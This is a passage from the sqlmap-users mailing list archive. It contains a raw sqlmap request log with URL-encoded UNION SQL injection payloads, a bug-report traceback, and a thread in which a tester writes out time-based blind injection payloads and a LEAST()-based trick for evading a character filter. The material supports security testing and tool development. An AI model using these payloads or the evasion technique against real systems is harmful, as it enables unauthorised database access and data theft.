ParamterOne=-7232%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28118%29%2BCHAR%2884%29%2BCHAR%28116%29%2BCHAR%28110%29%2BCHAR%28110%29%2BCHAR%28120%29%2BCHAR%2875%29%2BCHAR%2889%29%2BCHAR%2879%29%2BCHAR%2870%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#25] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:25 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#26]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 403

ParamterOne=-9968%27%29%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2868%29%2BCHAR%28100%29%2BCHAR%2867%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2868%29%2BCHAR%2868%29%2BCHAR%28109%29%2BCHAR%2874%29%2BCHAR%2868%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#26] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:31 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#27]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 402

ParamterOne=asdf%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28115%29%2BCHAR%28117%29%2BCHAR%2886%29%2BCHAR%28103%29%2BCHAR%28110%29%2BCHAR%2880%29%2BCHAR%28113%29%2BCHAR%2876%29%2BCHAR%2874%29%2BCHAR%2885%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#27] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:32 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#28]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 400

ParamterOne=asdf%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28103%29%2BCHAR%28121%29%2BCHAR%2867%29%2BCHAR%28117%29%2BCHAR%2867%29%2BCHAR%2878%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2881%29%2BCHAR%2876%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#28] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:36 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#29]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 400

ParamterOne=asdf%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28107%29%2BCHAR%2865%29%2BCHAR%28115%29%2BCHAR%2872%29%2BCHAR%28107%29%2BCHAR%2899%29%2BCHAR%2887%29%2BCHAR%2870%29%2BCHAR%2897%29%2BCHAR%2873%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#29] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:37 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#30]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 404

ParamterOne=-4167%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2899%29%2BCHAR%28109%29%2BCHAR%28101%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%2880%29%2BCHAR%28104%29%2BCHAR%28115%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#30] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:39 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#31]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 400

ParamterOne=-8283%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2889%29%2BCHAR%28109%29%2BCHAR%2899%29%2BCHAR%2890%29%2BCHAR%2886%29%2BCHAR%2890%29%2BCHAR%28121%29%2BCHAR%2884%29%2BCHAR%2880%29%2BCHAR%2878%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#31] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:40 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#32]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 404

ParamterOne=-4230%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2875%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28113%29%2BCHAR%2875%29%2BCHAR%2889%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28116%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP response [#32] (200 OK):
Content-length: 164
X-aspnet-version: 4.0.30319
Content-encoding: gzip
Vary: Uri: http://testhost.com:80/TestFile.aspx
Server: Microsoft-IIS/7.5
Date: Tue, 04 Jun 2013 08:20:42 GMT
X-powered-by: ASP.NET
Content-type: text/html; charset=utf-8

[{"id":0,"title":":jug:KleqKYCxq"}]

############################################################################

HTTP request [#33]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 403

ParamterOne=asdf%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2879%29%2BCHAR%2899%29%2BCHAR%2870%29%2BCHAR%2875%29%2BCHAR%28100%29%2BCHAR%2872%29%2BCHAR%28106%29%2BCHAR%2886%29%2BCHAR%2873%29%2BCHAR%28112%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#33] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:43 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#34]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 404

ParamterOne=asdf%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2873%29%2BCHAR%2889%29%2BCHAR%2883%29%2BCHAR%2875%29%2BCHAR%28122%29%2BCHAR%28110%29%2BCHAR%2876%29%2BCHAR%2869%29%2BCHAR%28119%29%2BCHAR%28104%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#34] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:45 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#35]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 406

ParamterOne=asdf%25%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28109%29%2BCHAR%28115%29%2BCHAR%28112%29%2BCHAR%2869%29%2BCHAR%2885%29%2BCHAR%2866%29%2BCHAR%2865%29%2BCHAR%28105%29%2BCHAR%28110%29%2BCHAR%28107%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#35] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:46 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#36]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 405

ParamterOne=-1429%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2873%29%2BCHAR%2872%29%2BCHAR%2881%29%2BCHAR%28115%29%2BCHAR%28115%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28112%29%2BCHAR%2875%29%2BCHAR%2889%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP response [#36] (200 OK):
Content-length: 161
X-aspnet-version: 4.0.30319
Content-encoding: gzip
Vary: Uri: http://testhost.com:80/TestFile.aspx
Server: Microsoft-IIS/7.5
Date: Tue, 04 Jun 2013 08:20:50 GMT
X-powered-by: ASP.NET
Content-type: text/html; charset=utf-8

[{"id":0,"title":":jug:IHQssImpK"}]

############################################################################

HTTP request [#37]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 406

ParamterOne=-5759%25%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2874%29%2BCHAR%2897%29%2BCHAR%2875%29%2BCHAR%28102%29%2BCHAR%28102%29%2BCHAR%28106%29%2BCHAR%2873%29%2BCHAR%2873%29%2BCHAR%28103%29%2BCHAR%28112%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#37] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:51 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#38]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 406

ParamterOne=-2560%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28115%29%2BCHAR%2884%29%2BCHAR%2870%29%2BCHAR%2867%29%2BCHAR%28101%29%2BCHAR%2882%29%2BCHAR%2880%29%2BCHAR%28111%29%2BCHAR%28122%29%2BCHAR%28116%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#38] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:53 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>

Re: [sqlmap-users] unhandled exception

[Miroslav S. <mir...@gm...>]

Hi Renato.

Thank you for your report and find it fixed with the latest revision.

Kind regards,
Miroslav Stampar


On Sun, Jun 2, 2013 at 3:56 PM, Renato Bermudes <ren...@gm...>wrote:

> qlmap version: 1.0-dev
> Python version: 2.7.4
> Operating system: posix
> Command line: /pentest/sqlmap/sqlmap.py
> --url=********************************************************
> --proxy=********************* --random-agent --batch --threads=10 -o -f
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>    File "/pentest/sqlmap/sqlmap.py", line 95, in main
>      start()
>    File "/pentest/sqlmap/lib/controller/controller.py", line 367, in start
>      checkNullConnection()
>    File "/pentest/sqlmap/lib/controller/checks.py", line 1128, in
> checkNullConnection
>      page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
>    File "/pentest/sqlmap/lib/request/connect.py", line 372, in getPage
>      conn = urllib2.urlopen(req)
>    File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
>      return _opener.open(url, data, timeout)
>    File "/usr/lib/python2.7/urllib2.py", line 404, in open
>      response = self._open(req, data)
>    File "/usr/lib/python2.7/urllib2.py", line 422, in _open
>      '_open', req)
>    File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
>      result = func(*args)
>    File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
>      return self.do_open(httplib.HTTPConnection, req)
>    File "/usr/lib/python2.7/urllib2.py", line 1181, in do_open
>      h.request(req.get_method(), req.get_selector(), req.data, headers)
>    File "/usr/lib/python2.7/httplib.py", line 973, in request
>      self._send_request(method, url, body, headers)
>    File "/usr/lib/python2.7/httplib.py", line 1007, in _send_request
>      self.endheaders(body)
>    File "/usr/lib/python2.7/httplib.py", line 969, in endheaders
>      self._send_output(message_body)
>    File "/usr/lib/python2.7/httplib.py", line 829, in _send_output
>      self.send(msg)
>    File "/usr/lib/python2.7/httplib.py", line 805, in send
>      self.sock.sendall(data)
>    File "/usr/lib/python2.7/socket.py", line 224, in meth
>      return getattr(self._sock,name)(*args)
> UnicodeEncodeError: 'ascii' codec can't encode character u'\u200e' in
> position 68: ordinal not in range(128)
>
>
>
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Server replaces some chars

[<du...@al...>]

Ah, I didn't try that one before.
That did the trick, thanks! :-)

On 2013-06-03 09:35, Dennis wrote:
> Haven't tried, but if it's just for the '>' character, you might wanna
> try '--tamper=between'. That should get rid of the '>' character in 
> the
> payloads.
> 
> Cheers
> Dennis
> 
> 
> Am 01.06.2013 22:39, schrieb du...@al...:
>> Just to add a bit to this, I tried something else that I got to work.
>> I changed the sqlmap payload by using LEAST(), which became this:
>> 
>> ',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('
>> 
>> Is this something sqlmap can currently do?
>> Or maybe there's a better solution for it?
>> Or should I implement it? (never looked at the sqlmap code, but might
>> be fun to start digging into).
>> 
>> Cheers for now!
>> 
>> 
>> On 2013-06-01 21:57, du...@al... wrote:
>>> Hey guys, I have a server at work where there's an SQLi in an 
>>> INSERT,
>>> but I can't prove that it's actually a threat so far due to a little
>>> "filter" that replaces some input characters.
>>> I crafted a little injection that injects a sleep into the insert, 
>>> and
>>> makes it sleep for 10 seconds, and then doesn't insert anything (due
>>> to
>>> a duplicate error that I made sure to get).
>>> 
>>> The original query looks like this:
>>> 
>>> insert into discount_phone_registry (phone_nbr,reg_date) values
>>> ('111',date(now()));.
>>> And the injection is in the phone_nbr, so I made the following
>>> injection: 111',(SLEEP(10))),('111
>>> And it then becomes: insert into discount_phone_registry
>>> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
>>> So, so far so good, right?
>>> 
>>> Well when I wanted to use sqlmap, I noticed that our filter is doing
>>> some stupid things ^^
>>> This is the payload from sqlmap
>>> 
>>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>>> 
>>> But as it gets submitted in the form, it becomes
>>> 
>>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>>> 
>>> Notice how the > became a _
>>> The tampering scripts I'm using are space2comment and charencode, 
>>> and
>>> charencode actually seems to trick it, since I'm getting the
>>> less/grater
>>> char in the error output from the web server now.
>>> If I copy/paste the payload directly from the web server error 
>>> output,
>>> directly into the MySQL client and run it, it works.
>>> 
>>> Is there anything else I can try to get this to work?
>>> 
>>> PS: If it helps I just noticed this!
>>> 
>>> 1064 - You have an error in your SQL syntax; check the manual that
>>> corresponds to your MySQL server version for the right syntax to use
>>> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
>>> insert into discount_phone_registry (phone_nbr,reg_date) values
>>> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>>> 
>>> Notice how it complains on ";16" which is probably the encoded > 
>>> sign
>>> (&gt;).
>>> 
>>> Thanks in advance! :-)
>>> 
>>> 
>>> 
>>> 
>>> ------------------------------------------------------------------------------
>>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>>> It's a free troubleshooting tool designed for production
>>> Get down to code-level detail for bottlenecks, with <2% overhead.
>>> Download for free and get started troubleshooting in minutes.
>>> http://p.sf.net/sfu/appdyn_d2d_ap2
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> ------------------------------------------------------------------------------
>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>> It's a free troubleshooting tool designed for production
>> Get down to code-level detail for bottlenecks, with <2% overhead.
>> Download for free and get started troubleshooting in minutes.
>> http://p.sf.net/sfu/appdyn_d2d_ap2
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Server replaces some chars

[Dennis <kor...@ya...>]

Haven't tried, but if it's just for the '>' character, you might wanna
try '--tamper=between'. That should get rid of the '>' character in the
payloads.

Cheers
Dennis


Am 01.06.2013 22:39, schrieb du...@al...:
> Just to add a bit to this, I tried something else that I got to work.
> I changed the sqlmap payload by using LEAST(), which became this:
>
> ',(SELECT/**/1/**/AND/**/9457=IF((LEAST(ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1)),16)=16),SLEEP(5),9457)/**/)),('
>
> Is this something sqlmap can currently do?
> Or maybe there's a better solution for it?
> Or should I implement it? (never looked at the sqlmap code, but might 
> be fun to start digging into).
>
> Cheers for now!
>
>
> On 2013-06-01 21:57, du...@al... wrote:
>> Hey guys, I have a server at work where there's an SQLi in an INSERT,
>> but I can't prove that it's actually a threat so far due to a little
>> "filter" that replaces some input characters.
>> I crafted a little injection that injects a sleep into the insert, and
>> makes it sleep for 10 seconds, and then doesn't insert anything (due 
>> to
>> a duplicate error that I made sure to get).
>>
>> The original query looks like this:
>>
>> insert into discount_phone_registry (phone_nbr,reg_date) values
>> ('111',date(now()));.
>> And the injection is in the phone_nbr, so I made the following
>> injection: 111',(SLEEP(10))),('111
>> And it then becomes: insert into discount_phone_registry
>> (phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
>> So, so far so good, right?
>>
>> Well when I wanted to use sqlmap, I noticed that our filter is doing
>> some stupid things ^^
>> This is the payload from sqlmap
>>
>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('
>>
>> But as it gets submitted in the form, it becomes
>>
>> 111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('
>>
>> Notice how the > became a _
>> The tampering scripts I'm using are space2comment and charencode, and
>> charencode actually seems to trick it, since I'm getting the 
>> less/grater
>> char in the error output from the web server now.
>> If I copy/paste the payload directly from the web server error output,
>> directly into the MySQL client and run it, it works.
>>
>> Is there anything else I can try to get this to work?
>>
>> PS: If it helps I just noticed this!
>>
>> 1064 - You have an error in your SQL syntax; check the manual that
>> corresponds to your MySQL server version for the right syntax to use
>> near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
>> insert into discount_phone_registry (phone_nbr,reg_date) values
>> ('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))
>>
>> Notice how it complains on ";16" which is probably the encoded > sign
>> (&gt;).
>>
>> Thanks in advance! :-)
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Get 100% visibility into Java/.NET code with AppDynamics Lite
>> It's a free troubleshooting tool designed for production
>> Get down to code-level detail for bottlenecks, with <2% overhead.
>> Download for free and get started troubleshooting in minutes.
>> http://p.sf.net/sfu/appdyn_d2d_ap2
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] unhandled exception

[Renato B. <ren...@gm...>]

qlmap version: 1.0-dev
Python version: 2.7.4
Operating system: posix
Command line: /pentest/sqlmap/sqlmap.py 
--url=******************************************************** 
--proxy=********************* --random-agent --batch --threads=10 -o -f
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
   File "/pentest/sqlmap/sqlmap.py", line 95, in main
     start()
   File "/pentest/sqlmap/lib/controller/controller.py", line 367, in start
     checkNullConnection()
   File "/pentest/sqlmap/lib/controller/checks.py", line 1128, in 
checkNullConnection
     page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
   File "/pentest/sqlmap/lib/request/connect.py", line 372, in getPage
     conn = urllib2.urlopen(req)
   File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
     return _opener.open(url, data, timeout)
   File "/usr/lib/python2.7/urllib2.py", line 404, in open
     response = self._open(req, data)
   File "/usr/lib/python2.7/urllib2.py", line 422, in _open
     '_open', req)
   File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
     result = func(*args)
   File "/usr/lib/python2.7/urllib2.py", line 1214, in http_open
     return self.do_open(httplib.HTTPConnection, req)
   File "/usr/lib/python2.7/urllib2.py", line 1181, in do_open
     h.request(req.get_method(), req.get_selector(), req.data, headers)
   File "/usr/lib/python2.7/httplib.py", line 973, in request
     self._send_request(method, url, body, headers)
   File "/usr/lib/python2.7/httplib.py", line 1007, in _send_request
     self.endheaders(body)
   File "/usr/lib/python2.7/httplib.py", line 969, in endheaders
     self._send_output(message_body)
   File "/usr/lib/python2.7/httplib.py", line 829, in _send_output
     self.send(msg)
   File "/usr/lib/python2.7/httplib.py", line 805, in send
     self.sock.sendall(data)
   File "/usr/lib/python2.7/socket.py", line 224, in meth
     return getattr(self._sock,name)(*args)
UnicodeEncodeError: 'ascii' codec can't encode character u'\u200e' in 
position 68: ordinal not in range(128)

Re: [sqlmap-users] Server replaces some chars

[<du...@al...>]

Just to add a bit to this, I tried something else that I got to work.
